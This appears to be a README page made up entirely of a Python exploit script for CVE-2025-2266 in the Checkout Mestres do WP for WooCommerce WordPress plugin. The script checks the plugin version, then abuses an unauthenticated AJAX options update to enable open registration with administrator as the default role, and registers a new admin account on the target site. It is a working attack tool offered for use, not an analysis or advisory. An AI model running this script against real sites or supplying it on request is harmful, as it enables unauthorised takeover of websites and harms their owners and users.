README.md
Rendering markdown...
# -*- coding: utf-8 -*-
import requests
import argparse
import time
# Exploit By : Nxploited | Khaled Alenazi,
requests.packages.urllib3.disable_warnings()
def parse_arguments():
parser = argparse.ArgumentParser(description="CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit By : Nxploited | Khaled Alenazi,")
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com/wordpress)")
parser.add_argument("-newuser", nargs='?', const="nxploited", help="Create new admin user (default username: nxploited)")
parser.add_argument("-email", nargs='?', const="[email protected]", default="[email protected]", help="Email for new user (default: [email protected])")
return parser.parse_args()
def prepare_session():
session = requests.Session()
session.verify = False
session.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
})
return session
def get_urls(base_url):
ajax_url = f"{base_url}/wp-admin/admin-ajax.php"
register_url = f"{base_url}/wp-login.php?action=register"
readme_url = f"{base_url}/wp-content/plugins/checkout-mestres-wp/readme.txt"
return ajax_url, register_url, readme_url
def check_plugin_vulnerability(session, readme_url):
try:
response = session.get(readme_url, timeout=10)
if "Stable tag: 8.6.5" in response.text or "Stable tag: 8.7.5" in response.text:
print("[+] Target is vulnerable! Exploiting now...")
time.sleep(3)
return True
else:
print("[-] Plugin version is not vulnerable.")
return False
except Exception as e:
print(f"[!] Could not read readme.txt: {e}")
print("[*] Trying to exploit anyway...")
return True
def enable_registration(session, ajax_url):
payload = {
"action": "cwmpUpdateOptions",
"data": "users_can_register=1&default_role=administrator"
}
response = session.post(ajax_url, data=payload)
print(f"[DEBUG] Response from exploit: {response.text.strip()}")
return "sucesso" in response.text.lower()
def register_new_user(session, register_url, username, email, base_url):
payload = {
"user_login": username,
"user_email": email
}
response = session.post(register_url, data=payload)
print(f"[DEBUG] Response from registration: {response.text.strip()}")
if "username" in response.text.lower() or response.status_code == 200:
print(f"[+] Step 2: User '{username}' registered successfully.")
print(f"[!] Login at: {base_url}/wp-login.php")
print(f"[!] Username: {username}")
print(f"[!] Email: {email}")
print("[!] Set password manually from admin panel or reset link.\n")
else:
print("[!] Registration sent, but check manually if user was created.")
def main():
args = parse_arguments()
base_url = args.url.rstrip("/")
username = args.newuser if args.newuser else None
email = args.email
session = prepare_session()
ajax_url, register_url, readme_url = get_urls(base_url)
print("====================================")
print(" CVE-2025-2266 Exploit Tool ")
print(" Author: Nxploited | Khaled Alenazi")
print("====================================\n")
if check_plugin_vulnerability(session, readme_url):
if enable_registration(session, ajax_url):
if username:
register_new_user(session, register_url, username, email, base_url)
else:
print("[-] Exploit failed — target may not be vulnerable.")
else:
print("[-] Target does not appear vulnerable.")
print("\n[✓] Exploit By Nxploited | Khaled Alenazi")
if __name__ == "__main__":
main()